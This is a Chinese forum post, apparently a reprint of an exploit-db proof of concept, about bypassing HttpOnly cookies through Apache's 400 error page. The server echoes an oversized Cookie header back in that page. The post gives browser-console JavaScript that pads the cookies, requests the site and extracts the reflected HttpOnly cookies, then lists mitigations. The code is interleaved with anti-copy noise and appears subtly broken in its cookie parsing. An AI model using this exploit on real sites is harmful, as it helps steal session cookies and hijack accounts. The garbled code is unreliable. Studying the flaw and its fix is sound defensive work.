很多程序以及一些商业或成熟开源的 CMS 文章系统,为了防止 XSS 盗取用户 cookie,一般都会给 cookie 加上 HttpOnly 属性,禁止 JS 直接读取用户 cookie,从而降低 XSS 的危害;而这个问题刚好可以用来绕过 cookie 的 HttpOnly 属性。
用 Chrome 打开一个站点,按 F12 打开开发者工具,切换到 Console,输入如下代码并回车:
& x: w; Q* `: z# r! ~0 d 6 \) d5 H a8 U" |
7 c, t+ c V) l: H! j1 M
// http://www.exploit-db.com/exploits/18442/
/**
 * Sets (when `good` is falsy) or expires (when `good` is truthy) ten cookies
 * named "xss0".."xss9" on path "/". Each padding cookie carries 819 "x"
 * characters; presumably the count and size are chosen so that the browser's
 * combined Cookie header exceeds the server's request-header limit and the
 * server answers with a 400 error page — confirm against the server config.
 * NOTE: this listing is interleaved with forum anti-copy noise; the original
 * source is the exploit-db / gist link given on this page.
 * @param {boolean} [good] - truthy: expire the cookies (cleanup); falsy/omitted: set them.
 */
\6 x h6 X8 E6 k: a7 ~function setCookies (good) {
5 Z* O6 W& @/ G) h+ G// Construct string for cookie value
2 k N( L/ X/ g) n/ ^8 Uvar str = "";) V9 m5 L5 E2 g) M, Z/ U$ |( t, n0 N' v
// 819 bytes of padding per cookie (see the size note in the header comment).
for (var i=0; i< 819; i++) {
( S, N- L9 O1 r! Zstr += "x";
4 M( c% `0 a& R( m2 r}
% _: H" E7 W e4 m* \3 |// Set cookies
1 O4 @# J' G' T% H. r" G1 J# g5 Wfor (i = 0; i < 10; i++) {
) k1 S1 n) O; \) ~: M. w// Expire evil cookie
* E4 P0 L1 l) X! b0 d, _if (good) {
// An `expires` one millisecond in the past makes the browser drop the cookie.
( q& @ d4 \( |. o+ hvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
4 g" d) [* r& e, C+ u}
* t0 H& z& G8 Q( [' G' J5 q2 B// Set evil cookie; W; f6 E2 F) ~0 \+ S
else {
9 t% K5 e; b; X+ tvar cookie = "xss"+i+"="+str+";path=/";/ T* D. w" g, v$ F( S) N6 L7 V+ Z5 f# C
}
// Writing through document.cookie only touches the padding cookies; the
// HttpOnly cookies the page is about are never readable from script here.
9 I5 P& ?! B. |6 p8 Edocument.cookie = cookie;9 Q" G- H* U* P9 w- x' Q Y Y
}
* q; [4 B( N8 T+ V4 q}
/**
 * Plants the oversized padding cookies, then issues an async GET for "/" and
 * hands the response to `parseCookies`. The point the page makes: on an
 * affected server the 400 error page itself echoes the rejected request
 * header (inside a <pre> block), so cookies that script cannot read via
 * document.cookie because of HttpOnly appear in xhr.responseText instead.
 * Mitigation, per the page: a custom `ErrorDocument 400` message so the error
 * page no longer reflects the request, or an upgraded httpd.
 * NOTE: this listing is interleaved with forum anti-copy noise; see the
 * exploit-db / gist link on this page for the original source.
 */
$ ]1 e5 c, l+ s) jfunction makeRequest() {: |8 x' E: _; r1 y7 q
setCookies();. c! D1 w! F4 B% Z v
/**
 * onreadystatechange handler: reads `xhr` from the enclosing scope, reacts
 * only to a finished request with status 400, extracts the <pre> body,
 * strips the "Cookie: " prefix and the xss* padding cookies, and collects the
 * remaining name=value pairs into `cookie_dict` before showing them.
 */
function parseCookies () {
7 l( @3 i* G. qvar cookie_dict = {};/ v% M6 f; a; T, v& h4 W
// Only react on 400 status+ V5 r A( Z; m. L: P6 k N
if (xhr.readyState === 4 && xhr.status === 400) {
/ q+ _( R) R8 S0 i0 n! E4 J) Y+ m// Replace newlines and match <pre> content
// Newlines are removed first because `.` in the regex does not match them.
$ r! w) H0 Q; X- B; yvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
) g% v. `- ~. ?, l- V5 Rif (content.length) {& r5 g" A: {: X) u" @) V+ e
// Remove Cookie: prefix
) }( I5 F) p0 ]" [content = content[1].replace("Cookie: ", "");
// Drop the padding cookies set by setCookies(); only the server-set ones remain.
, W- f1 }# J- l/ ~8 T$ u3 \4 wvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
; h) O Y; F) _% i- h7 T8 s/ k// Add cookies to object
' d, ^$ N2 T7 W: \for (var i=0; i<cookies.length; i++) {
" P" a" b6 b2 jvar s_c = cookies.split('=',2);
B5 c4 E) \+ b( C9 _2 m* O9 ucookie_dict[s_c[0]] = s_c[1];8 r' E" t4 [1 X
}# A, }& v- E9 p
}5 f' Z/ G% C& O- R
// Unset malicious cookies
; m' Z* ~/ C# _) F% Z8 _5 T+ csetCookies(true);
: J$ s. t- o7 J9 `0 Walert(JSON.stringify(cookie_dict));2 i# L) D2 @& m, ]8 J! ~9 ~/ x+ |
}
* [; `7 }" {% y1 N}
8 _; l, a1 l4 h* [: z9 E// Make XHR request
// Same-origin request; the browser attaches every cookie for "/", including
// the HttpOnly ones, which is why a reflecting 400 page leaks them.
/ y. a$ m( N( g# w( Mvar xhr = new XMLHttpRequest();; H) J7 B" O( ^$ n! u; y
xhr.onreadystatechange = parseCookies;" x0 o4 [6 n+ |# e. g
xhr.open("GET", "/", true);! i! W+ U# t: V2 i
xhr.send(null);8 w% k$ ?: |6 U
}
// Entry point: sets the padding cookies, requests "/" and parses the 400 page.
/ u8 e; [+ r; I. omakeRequest(); m0 k9 \3 p' M9 M0 W
/ L- T4 d! p9 }0 J: p
你就能看到华丽丽的 400 错误页面里包含着 cookie 信息。
& \( c# N0 V' {0 X9 H! V
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download
- B$ ^* `+ V2 V" F; g& x
修复方案:
Apache 官方提供 4 种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下:
% S$ e9 {4 L0 Q; n
In the event of a problem or error, Apache can be configured to do one of four things:
) I+ u; _6 @; |% } |- P# n/ ?& U6 B1 r0 Q2 Q( h( S
1. output a simple hardcoded error message —— 输出一个简单生硬的错误信息
2. output a customized message —— 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error —— 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error —— 转向一个外部 URL
% \ Y9 r+ D4 u5 _: S- i) C: @: W
经测试,对于 400 错误只有方法 2 有效:配置后,返回包不会再包含 cookie 内容。
0 f6 b4 j, h2 x$ e* p& _- [" K/ N8 E" y; d# F# w
Apache 配置:
ErrorDocument 400 "security test"
: r/ s# I7 m- q4 ?+ e5 }
当然,把 Apache 升级到最新版本也可以 :)。
参考:http://httpd.apache.org/security/vulnerabilities_22.html
1 b5 S8 q' h3 Q) s: X1 i/ n |